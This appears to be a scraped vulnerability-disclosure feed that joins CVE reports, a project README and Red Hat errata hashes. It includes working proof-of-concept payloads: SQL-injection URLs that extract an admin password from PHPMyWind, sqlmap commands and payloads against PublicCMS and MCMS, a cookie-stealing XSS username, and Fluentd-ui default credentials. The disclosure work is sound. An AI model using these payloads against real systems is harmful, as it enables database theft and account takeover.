OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html.

     

**Free, open source Project Management software****Introduction**

Orangescrum is the simple yet powerful free and open source project management software that allows teams to organize their tasks, projects and resources with real time project collaboration. Track the task progress and get notifications on their completion with the Orangescrum project management tool. Get the complete picture of all tasks and team activities in real-time. Orangescrum also offers SaaS/Cloud edition and an option to upgrade the community edition to enterprise self-hosted edition.

Orangescrum open-source is a flexible project management web application written using CakePHP.

New features, enhancements, and updates are released on a regular basis.

Pull requests and bug reports are always welcome!

Visit our website to get a free trial of the premium service.

**Features**

Orangescrum provides the rich set features of Project Management.

The key features are:

*   Task Management
    *   Task Groups
    *   Tasks
    *   Task Type
    *   Task View
        *   Calendar View
        *   List View
    *   Task Due Date
    *   Task Tracking
*   Time Log
*   Reports & Analytics
*   Email Notifications
*   Import & Export
*   Project Collaboration
*   Default Status Workflow
*   Default User Role Management

**Task List View**

**Add/Edit Task Form View**

**Task Details View**

**Project Card View**

**Dashboard View**

We use Orangescrum in our daily jobs to manage our customers information, projects. It is deployed in the production environment of our premium users, and we supported several organizations to deploy this community version on their servers as well. We take care of our open source edition similar than we do for our cloud/enterprise self-hosted edition, in fact both of them use the same code base structure. So feel free to use it in your organization or business!

**System Requirements**

*   Apache with mod_rewrite
    *   Enable curl in php.ini
    *   Change the 'post\_max\_size' and upload_max_filesize to 200Mb in php.ini
*   PHP 7.2
*   cakephp 2.8
*   MySQL 5.6 or 5.7
    *   If STRICT mode is On, turn it Off.

**How to Download the Package from Orangescrum GitHub repository?**

To download the Orangescrum Open-source package from the GitHub repository, please follow the process:

**Installation**

*   Extract the archive. Upload the extracted folder(orangescrum-master) to your working directory.
*   Provide proper write permission to "app/Config", "app/tmp" and "app/webroot" folders and their sub-folders. Ex. chmod -R 0777 app/Config, chmod -R 0777 app/tmp, chmod -R 0777 app/webroot You can change the write permission of "app/Config" folder after installation procedure is completed.
*   Create a new MySQL database named "orangescrum"(utf8_unicode_ci collation).
*   Get the database.sql file from the root directory and import that to your database.
*   Locate your app directory, do the changes on following files:
    *   app/Config/database.php - We have already updated the database name as "Orangescrum" which you can change at any point. In order to change it, just create a database using any name and update that name as database in DATABASE\_CONFIG section. And also you can set a password for your Mysql login which you will have to update in the same page as password. \[Required\]
*   Run the application as https://www.your-site.com/ from your browser and start using Orangescrum

For more information please visit below link: https://www.orangescrum.com/open-source/general-installation-guide

**Supported Languages**

Orangescrum community edition supports the following languages:

*   Danish
*   English
*   French
*   German
*   Portuguese
*   Spanish

**Updates**

New features, enhancements, and updates appear on a regular basis. You just need to follow these checkpoints:

Make sure to take a backup of your database and files Replace all files in your directory with the updated version.

Users can check the new releases at: https://www.orangescrum.com/open-source/release-notes

**Community**

Need help to set up Orangescrum? Want to know more about cool enhancements? Feel free to visit our community forum. You can also subscribe to our newsletter to get any important announcements and releases.

**Report bugs**

Did you find a bug? please create an issue for it before starting any work on a pull request.

**Support / Contact**

Get in touch with us here. We are available for any type of support, queries or help at all times. Feel free to join our discussion forums as well!

*   Orangescrum Helpdesk https://www.helpdesk.orangescrum.com/
*   Contact Us https://www.orangescrum.com/contact/
*   Community Forum https://groups.google.com/g/orangescrum-community-support

**About**

Orangescrum open-source project management software is ideal for small teams or for individual usage.

CVE-2023-0738: GitHub - Orangescrum/orangescrum: Orangescrum is a simple yet powerful free and open source project management software that helps team to organize their tasks, projects and deliver more.

An unauthorized access issue found in XiaoBingby TeaCMS 2.3.3 allows attackers to escalate privileges via the id and keywords parameter(s).

TeaCMS存在逻辑缺陷

项目介绍

TeaCMS是由Spring-SpringMVC-MyBatis-MySQL数据库开发的一个博客系统。

开源项目地址  
https://gitee.com/xiaobingby/TeaCMS

技术选择  
后端：1.Spring、2.Spring MVC、3.MyBatis、4.druid-数据库连接池  
5.PageHelper-Mybatis通用分页插件、6.FreeMarker-模板引擎  
前端：1.Bootstrap、2.jQuery、3.jQuery Form、4.Vue.js、5.pace.js–网页自动加载进度条插件、6.bootstrapValidator.js-最好用的bootstrap表单验证插、7.lobibox-强大的jQuery消息通知框和信息提示框插件、8.ECharts-Javascript 的图表库  
后台-UI：、1.Bootstrap-AdminLTE

漏洞概述  
TeaCMS后台管理界面存在垂直越权漏洞普通用户demo可以访问超级管理员用户root的接口，进一步修改网站信息。

影响版本  
2.3.3.RELEASE  
环境搭建  
1、下载源码，导入IDEA，使用maven进行编译  
2、初始化数据库  
漏洞复现  
1.登录管理员root用户访问管理员界面，添加0权普通用户demo

登录demo用户，查看后台权限：

2.使用burpsuit抓取该管理员后台设置数据包

数据包如下：

3.将数据包中admin用户的cookie替换成demo用的cookie

发包成功，利用demo用户身份成功更改网站信息：

漏洞分析  
缺陷代码位置  
@RequestMapping(value = "/config.html")  
public String config(ModelMap modelMap) {

    WebConfig webConfig = webconfigDao.selectByPrimaryKey(1);
    
    modelMap.put("webConfig", webConfig);
    return "_admin/system/config";
    

缺陷方法：config

这里没有对访问该接口的用户进行身份验证

修复方式  
对可允许访问该接口的用户身份类型进行严格限制

CVE-2023-27091: TeaCMS have a logic flaw · Issue #I6SXAF · XiaoBingBy/TeaCMS - Gitee.com

Cross Site Scripting vulnerability found in Ehuacui BBS allows attackers to cause a denial of service via a crafted payload in the login parameter.

ehuacui-bbs代码审计  
项目介绍  
使用 springboot2+beetl+beetsql+elasticsearch 开发的论坛，该项目源于pybbs,使用Spring等框架进行服务端重写，优化了 源工程部分实现逻辑，前台模板和数据库表结构目前大体与pybbs 保持一致。  
开源地址  
https://gitee.com/ehuacui/ehuacui-bbs  
使用技术  
jdk1.7  
tomcat8  
Spring+MyBatias+SpringMVC  
freemarker  
mysql  
bootstrap  
ehcache  
scribejava  
Nginx  
工程简介  
bbs-doc 文档相关  
bbs-front 前端逻辑实现(部署到Nginx)  
bbs-server 后台逻辑实现(部署到Tomcat)  
bbs-sql 数据库脚本相关

漏洞复现  
手动打包  
mvn clean package  
打包完成后，会在项目根目录下的target目录里生成一个pybbs.jar文件，解压运行 java -jar pybbs.jar 即可启动论坛服务  
其实手动打包后生成的tar.gz文件就是github上release里最新的发布包，下载后解压内容是一样的  
配置本地tomcat服务

可以在数据库中看到成功注册名为<script>alert(document.cookie)</script>的用户  
漏洞分析  
用户名存储型xss  
登录成功后，未经过滤直接将用户信息在前台展示

用户注册一个用户名为<script>alert(document.cookie)</script>的用户，前台直接显示  

信息泄露：  
在用户登录成功后，cookie中的信息遭到泄露

CVE-2023-27089: ehuacui-bbs storage XSS · Issue #3 · ehuacui/ehuacui-bbs

Updated Satellite 6.12 packages that fixes important security bugs and several
regular bugs are now available for Red Hat Satellite.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-41946: A flaw was found in org.postgresql. This issue allows the creation of a temporary file when using PreparedStatement.setText(int, InputStream) and PreparedStatemet.setBytea(int, InputStream). This could allow a user to create an unexpected file available to all users, which could end in unexpected behavior.


SRPM candlepin-4.1.20-1.el8sat.src.rpm SHA-256: 346847657c60ccd666ce5fed8b093ad697aa8dcdc4d1dbd493e5b06492dbc41b foreman-3.3.0.21-2.el8sat.src.rpm SHA-256: 3f0834a984705c55daebe4168023bfc040eedb4a7a1123fbab9c8acc11984f49 python-django-3.2.16-1.el8pc.src.rpm SHA-256: f516eac58d9354c32d84d9f15396e942543fba4dbf389fcb0bacdd91f7520345 python-pulp-container-2.10.12-1.el8pc.src.rpm SHA-256: 9b70d268759ff149f697e0a3b819bbb0bbcd294deeca9903fb9aaaf17d8d707f python-pulpcore-3.18.16-1.el8pc.src.rpm SHA-256: 8a1be5f6f590196c1b6bc9c95334ccf9a68e94ec9debecdf61fb1eea00b2c0cb rubygem-fog-vsphere-3.6.0-1.el8sat.src.rpm SHA-256: 6bb8b6682f02465d1d14b1a56d41394e975999ce4d2329415a2f76055e113c95 rubygem-foreman\_maintain-1.1.12-1.el8sat.src.rpm SHA-256: 331ad894085a8d7feb30dec40a7e2d87ddaf9bfe247dbf2137ae82666012d71e rubygem-hammer\_cli\_katello-1.6.0.2-1.el8sat.src.rpm SHA-256: 1ec9a4b7c068a5b9b6be73b45648cab76d194df243f23832b27a3ac06b83aa70 rubygem-katello-4.5.0.32-1.el8sat.src.rpm SHA-256: e2096e5e31a246c25899840cbe1ca3c78816ab650fc0561b91f274394d603d5d rubygem-optimist-3.0.1-1.el8sat.src.rpm SHA-256: 8d827772525c54a2313617817e0cb3e1d817b510b22516124756562d483ebe0b rubygem-rbvmomi2-3.6.0-2.el8sat.src.rpm SHA-256: 139896162b7570f89ddccde5a539e8ec12e561c9a276b9e5edf2676aca6d6be8 satellite-6.12.3-1.el8sat.src.rpm SHA-256: b7e2fbaa5f82ce1cd824960060a7363e691a5c4de41f716b15b46a17a67ebfa2 x86\_64 candlepin-4.1.20-1.el8sat.noarch.rpm SHA-256: dc65236f025d116ca4ad42f7f8799a170f2f367da05a0cae6750fb900a2876a9 candlepin-selinux-4.1.20-1.el8sat.noarch.rpm SHA-256: fc8e96387613765708cf515226be3f5c37bfe429c9f0c3c51e56854acb2f7e2d foreman-3.3.0.21-2.el8sat.noarch.rpm SHA-256: faeefbb4fc2baea56fd5f1c9206eedd7358c51b461fbc655cc26decfc7cd1214 foreman-cli-3.3.0.21-2.el8sat.noarch.rpm SHA-256: c2827b228f4d3375e90815a60e29c5845a397c17da8d7e49762cfd11334d3f25 foreman-debug-3.3.0.21-2.el8sat.noarch.rpm SHA-256: c12ff146996ad3c77a4f358c4de39646ed5ce0ecfaff2a20429f1b136d7f277a foreman-dynflow-sidekiq-3.3.0.21-2.el8sat.noarch.rpm SHA-256: c918d6d92d807c7656db823d6a541e336f865e35af251c8dfd63496250fab570 foreman-ec2-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 5a88d481dbea5be0d7e962cdf6c07bc80af1be3c6f34d9db095d83f7e7ed30b6 foreman-gce-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 4128972a65e69dacd8d531937a7f82678fd80e7c5040a1b272eb25041dd218fa foreman-journald-3.3.0.21-2.el8sat.noarch.rpm SHA-256: c608ed0033b2b41d44ba0fd34093f29e391b49e74770a70bcca3db2f536cd8f0 foreman-libvirt-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 08fdd54b81c925119a5fa5e487ae4e2269b2b969ea3f580733fa922491eab757 foreman-openstack-3.3.0.21-2.el8sat.noarch.rpm SHA-256: bd746df415a61eb9fc67345a8bb9f04443465995b040a270b1e6a3397600098c foreman-ovirt-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 79ff5697671109bafb9df7cc00668031bfb9db3b4db956c3b4087817d4204ef6 foreman-postgresql-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 4f0f0eff13d0b026b501325e5a2c3b1fffefad74fd5902490bc48b0f78bd222f foreman-service-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 463d6ade4bcc36329737f091999680bd4e6e4536a1905121d6056c48afb59f4a foreman-telemetry-3.3.0.21-2.el8sat.noarch.rpm SHA-256: ebaa35df47c9a3df8dc24812b6e2306427d5b31c3c8a942a14f884c69bbe11eb foreman-vmware-3.3.0.21-2.el8sat.noarch.rpm SHA-256: 56b5e3351b4e6d3a50f0693f99c510531d03b99b2c178d7dbc4e2dffbec63c25 python39-django-3.2.16-1.el8pc.noarch.rpm SHA-256: 9c7924cd8936834939e8310b99bc76e378bdd5a0a6a2f4056722e320dd83cdab python39-pulp-container-2.10.12-1.el8pc.noarch.rpm SHA-256: dc424db94f97169493bf4f2e103ef1893556e5d5266e0104d9ce41957795019e python39-pulpcore-3.18.16-1.el8pc.noarch.rpm SHA-256: 9da831af382222aff43f7c775e0ae8046889db2387256f99d80910c9e93a3289 rubygem-fog-vsphere-3.6.0-1.el8sat.noarch.rpm SHA-256: 835ea0ef40bf1c14e96ec60d198229f10c87a1f5dd6e96d92a458127245d7c29 rubygem-foreman\_maintain-1.1.12-1.el8sat.noarch.rpm SHA-256: 083d754e6d15eea7edaab8860d9fa92d0263e06c091858ef7d33d0dbd871e8d3 rubygem-hammer\_cli\_katello-1.6.0.2-1.el8sat.noarch.rpm SHA-256: eacaa1c9db05481b06057815d41e3c478372545c2e13f3f6531e83dd0b524870 rubygem-katello-4.5.0.32-1.el8sat.noarch.rpm SHA-256: 3d751404ab52f30bbb3a4daf3ade1ea53b79ece842972bce56a4b0752461ffe8 rubygem-optimist-3.0.1-1.el8sat.noarch.rpm SHA-256: 86b074fa0d85d682ee363305aba3c9cb8718731e2eedf029ebeb57bc114fa3cb rubygem-rbvmomi2-3.6.0-2.el8sat.noarch.rpm SHA-256: 0ba4ce5c54a92422bf11fd0e6b00e19f19d06e568f19ef03a8323019c2ea4a8c satellite-6.12.3-1.el8sat.noarch.rpm SHA-256: f4871f88055d2a83f72ec1cce0bbf1f99abdd16d6efbce0b51e0f4b510755b43 satellite-cli-6.12.3-1.el8sat.noarch.rpm SHA-256: a38562ac2f1cd9ac188d08076fac181a77ad2bc79a1690e2af82442ae8b2f0aa satellite-common-6.12.3-1.el8sat.noarch.rpm SHA-256: b5e86c99c39949e1bb9ae210246aea65b3b0b09f7600cf11ed46ec2fe5561015

SRPM foreman-3.3.0.21-2.el8sat.src.rpm SHA-256: 3f0834a984705c55daebe4168023bfc040eedb4a7a1123fbab9c8acc11984f49 python-django-3.2.16-1.el8pc.src.rpm SHA-256: f516eac58d9354c32d84d9f15396e942543fba4dbf389fcb0bacdd91f7520345 python-pulp-container-2.10.12-1.el8pc.src.rpm SHA-256: 9b70d268759ff149f697e0a3b819bbb0bbcd294deeca9903fb9aaaf17d8d707f python-pulpcore-3.18.16-1.el8pc.src.rpm SHA-256: 8a1be5f6f590196c1b6bc9c95334ccf9a68e94ec9debecdf61fb1eea00b2c0cb rubygem-foreman\_maintain-1.1.12-1.el8sat.src.rpm SHA-256: 331ad894085a8d7feb30dec40a7e2d87ddaf9bfe247dbf2137ae82666012d71e satellite-6.12.3-1.el8sat.src.rpm SHA-256: b7e2fbaa5f82ce1cd824960060a7363e691a5c4de41f716b15b46a17a67ebfa2 x86\_64 foreman-debug-3.3.0.21-2.el8sat.noarch.rpm SHA-256: c12ff146996ad3c77a4f358c4de39646ed5ce0ecfaff2a20429f1b136d7f277a python39-django-3.2.16-1.el8pc.noarch.rpm SHA-256: 9c7924cd8936834939e8310b99bc76e378bdd5a0a6a2f4056722e320dd83cdab python39-pulp-container-2.10.12-1.el8pc.noarch.rpm SHA-256: dc424db94f97169493bf4f2e103ef1893556e5d5266e0104d9ce41957795019e python39-pulpcore-3.18.16-1.el8pc.noarch.rpm SHA-256: 9da831af382222aff43f7c775e0ae8046889db2387256f99d80910c9e93a3289 rubygem-foreman\_maintain-1.1.12-1.el8sat.noarch.rpm SHA-256: 083d754e6d15eea7edaab8860d9fa92d0263e06c091858ef7d33d0dbd871e8d3 satellite-capsule-6.12.3-1.el8sat.noarch.rpm SHA-256: 8de3c3d399222bdf6b56fc4af2b5bb78f7bc258d6ef008efe9887e831a743edf satellite-common-6.12.3-1.el8sat.noarch.rpm SHA-256: b5e86c99c39949e1bb9ae210246aea65b3b0b09f7600cf11ed46ec2fe5561015

SRPM foreman-3.3.0.21-2.el8sat.src.rpm SHA-256: 3f0834a984705c55daebe4168023bfc040eedb4a7a1123fbab9c8acc11984f49 rubygem-foreman\_maintain-1.1.12-1.el8sat.src.rpm SHA-256: 331ad894085a8d7feb30dec40a7e2d87ddaf9bfe247dbf2137ae82666012d71e rubygem-hammer\_cli\_katello-1.6.0.2-1.el8sat.src.rpm SHA-256: 1ec9a4b7c068a5b9b6be73b45648cab76d194df243f23832b27a3ac06b83aa70 satellite-6.12.3-1.el8sat.src.rpm SHA-256: b7e2fbaa5f82ce1cd824960060a7363e691a5c4de41f716b15b46a17a67ebfa2 x86\_64 foreman-cli-3.3.0.21-2.el8sat.noarch.rpm SHA-256: c2827b228f4d3375e90815a60e29c5845a397c17da8d7e49762cfd11334d3f25 rubygem-foreman\_maintain-1.1.12-1.el8sat.noarch.rpm SHA-256: 083d754e6d15eea7edaab8860d9fa92d0263e06c091858ef7d33d0dbd871e8d3 rubygem-hammer\_cli\_katello-1.6.0.2-1.el8sat.noarch.rpm SHA-256: eacaa1c9db05481b06057815d41e3c478372545c2e13f3f6531e83dd0b524870 satellite-cli-6.12.3-1.el8sat.noarch.rpm SHA-256: a38562ac2f1cd9ac188d08076fac181a77ad2bc79a1690e2af82442ae8b2f0aa

RHSA-2023:1630: Red Hat Security Advisory: Satellite 6.12.3 Async Security Update

SQL Injection vulnerability found in Ming-Soft MCMS v.4.7.2 allows a remote attacker to execute arbitrary code via `basic_title` parameter. This issue is resolved in v5.1.

**Ming-Soft MCMS vulnerable to SQL injection**

High severity GitHub Reviewed Published Apr 4, 2023 to the GitHub Advisory Database • Updated Apr 4, 2023

GHSA-hx8p-9m48-g76r: Ming-Soft MCMS vulnerable to SQL injection

SQL Injection vulnerability found in San Luan PublicCMS v.4.0 allows a remote attacker to execute arbitrary code via the sql parameter.

Where SQL injection vulnerability code appears  
com.publiccms.controller.admin.sys.SysSiteAdminController

    @Csrf
    
    public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request,
    
            ModelMap model) {
    
        if (ControllerUtils.verifyCustom("noright", !siteComponent.isMaster(site.getId()), model)) {
    
            return CommonConstants.TEMPLATE_ERROR;
    
        }
    
        if (-1 < sql.indexOf(CommonConstants.BLANK_SPACE)) {
    
            String type = sql.substring(0, sql.indexOf(CommonConstants.BLANK_SPACE));
    
            try {
    
                if ("update".equalsIgnoreCase(type)) {
    
                    model.addAttribute("result", sqlService.update(sql));
    
                } else if ("insert".equalsIgnoreCase(type)) {
    
                    model.addAttribute("result", sqlService.insert(sql));
    
                } else if ("delete".equalsIgnoreCase(type)) {
    
                    model.addAttribute("result", sqlService.delete(sql));
    
                } else {
    
                    model.addAttribute("result", JsonUtils.getString(sqlService.select(sql)));
    
                }
    
            } catch (Exception e) {
    
                model.addAttribute("error", e.getMessage());
    
            }
    
            model.addAttribute("sql", sql);
    
            logOperateService.save(new LogOperate(site.getId(), admin.getId(), LogLoginService.CHANNEL_WEB_MANAGER,
    
                    "execsql.site", RequestUtils.getIpAddress(request), CommonUtils.getDate(), JsonUtils.getString(model)));
    
        }
    
        return CommonConstants.TEMPLATE_DONE;
    
    }`
    

sqlService.update(sql)=>SqlMapper.xml  
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper"> <select id="select" parameterType="String" resultType="map">${sql}</select> <select id="query" parameterType="String" resultType="map">${sql}</select> <insert id="insert" parameterType="String">${sql}</insert> <update id="update" parameterType="String">${sql}</update> <delete id="delete" parameterType="String">${sql}</delete> </mapper>

\[20:45:23\] \[INFO\] the back-end DBMS is MySQL web application technology: JSP  
back-end DBMS: MySQL >= 5.0.12

view the tables in PublicCMS databases:  
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS\_ADMIN=1\_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm\_lvt\_4674b425370d9f190347b297042ae0b1=1552053320" --data "\_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables

CVE-2020-20914: There is a SQL Injection vulnerability that can dump the database · Issue #29 · sanluan/PublicCMS

SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function.

Here is part of the code:

in TemplateController.php at line 108– yii\\db\\Command::queryAll()

$sql .= " and (dab.company = '' or dab.company is null) ";  
}

        $sql = \Yii::$app->db->createCommand($sql)->bindValue('pagename',$pageName);
        $sql = \Yii::$app->db->createCommand($sql);
        $space = $sql->queryAll();
    
        $sql = "SELECT
                    dab.id,
                    dab.ubication,
                    dab.carrousel,
                    dab.position,
    

The SQL being executed was:

SELECT dab.id,dab.ubication,dab.carrousel,dab.position,dab.html,dab.adapt,dab.text FROM pages AS p  
LEFT JOIN templates AS dab ON p.id=dab.id\_pag AND dab.status = 1 AND dab.position <> 0  
WHERE dab.code='PAG'' AND dab.carrousel = 0 AND dab.adapt = 0 and (dab.company = '' or dab.company is null)

CVE-2023-26750: Yii 2 <= 2.0.47 SQL Injection Vulnerability · Issue #19755 · yiisoft/yii2

An issue was discovered in Fluent Fluentd v.1.8.0 and Fluent-ui v.1.2.2 allows attackers to gain escilated privlidges and execute arbitrary code due to a default password.

**vulnerability info**

After the default deployment of Fluentd-ui, it is not mandatory to change the password and there is a default password.

    $ sudo /usr/sbin/td-agent-ui start
    Puma 2.9.2 starting...
    * Min threads: 0, max threads: 16
    * Environment: production
    * Listening on tcp://0.0.0.0:9292
    
    Then, open http://localhost:9292/ by your browser.
    The default account is username="admin" and password="changeme"
    

And there is a built-in command execution plug-in for flund. Therefore, in the case of replacement after deployment, there is a remote command execution vulnerability.

    in_exec is included in Fluentd's core. No additional installation process is required.
    <source>
      @type exec
      command cmd arg arg
      keys k1,k2,k3
      tag_key k1
      time_key k2
      time_format %Y-%m-%d %H:%M:%S
      run_interval 10s
    </source>
    

**Many products have the same function,but security by default**

such as:

*   SQL Server xp\_cmdshell

    Permissions
    Because malicious users sometimes attempt to elevate their privileges by using xp_cmdshell, xp_cmdshell is disabled by default. Use sp_configure or Policy Based Management to enable it. For more information, see xp_cmdshell Server Configuration Option.
    
    When first enabled, xp_cmdshell requires CONTROL SERVER permission to execute and the Windows process created by xp_cmdshell has the same security context as the SQL Server service account. The SQL Server service account often has more permissions than are necessary for the work performed by the process created by xp_cmdshell. To enhance security, access to xp_cmdshell should be restricted to highly privileged users.
    

*   huginn  
    

**Security recommendations**

By default, security should adhere to the default security principles.

*   First, the in\_exec Input plugin should be disabled by default. If the user actually uses the function, it should be turned on separately. This can protect all users who do not use the function
*   In addition, the login password should be randomly generated or changed after the first login.

CVE-2020-21514: There is a remote command execution vulnerability on version 0.12-1.0 · Issue #295 · fluent/fluentd-ui

SQL injection vulnerability found in PHPMyWind v.5.6 allows a remote attacker to gain privileges via the delete function of the administrator management page.

Product Homepage:http://phpmywind.com/  
hello!  
I found a serious SQL injection vulnerability in the backend management system(/admin/admin_save.php) of PHPMyWind v5.6

This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords

Vulnerability validation：  
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers  
  
Now to the site administrator login background management system, click the administrator management, and then "delete function" is the location of the vulnerability  
  
it's url is http://127.0.0.1/admin/admin_save.php?action=del&id=4  
  
**POC**  
(1)  
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27  
  
(2)show the current database

    http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))
    

  
(3) Query out the super administrator password

    http://127.0.0.1/admin/admin_save.php?action=del&id=4  and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))
    

  
This vulnerability allows you to query the database for any data you want

CVE-2020-21060: sql injection exists many places in PHPMyWind v5.6 · Issue #10 · gaozhifeng/PHPMyWind

SQL Injection vulnerability found in Ming-Soft MCMS v.4.7.2 allows a remote attacker to execute arbitrary code via basic_title parameter.

@RequestMapping(value = "/{searchId}/search")  
@responsebody  
public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) {  
SearchEntity \_search = new SearchEntity();  
\_search.setAppId(BasicUtil.getAppId());  
\_search.setSearchId(searchId);  
// 获取对应搜索模型  
SearchEntity search = (SearchEntity) searchBiz.getEntity(\_search);  
//判断当前搜索是否有模板文件  
if (ObjectUtil.isNull(search)) {  
this.outJson(response, false);  
}  
Map<String, Object> map = new HashMap<>();  
// 读取请求字段  
**Map<String, String\[\]> field = request.getParameterMap();**  
//TODO  
Map<String, String> basicField = getMapByProperties(net.mingsoft.mdiy.constant.Const.BASIC\_FIELD);  
// 文章字段集合  
Map<String, Object> articleFieldName = new HashMap<String, Object>();  
// 自定义字段集合  
Map<String, String> diyFieldName = new HashMap<String, String>();

Parameter: basic\_title (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)  
Payload: basic\_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: basic_title=q') AND EXTRACTVALUE(9263,CONCAT(0x5c,0x716b627871,(SELECT (ELT(9263=9263,1))),0x71786b7a71)) AND ('nLqp'='nLqp
    
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: basic_title=q') OR SLEEP(5)#
    

Ask the author to fix this vulnerability.Thanks.

Tag

#sql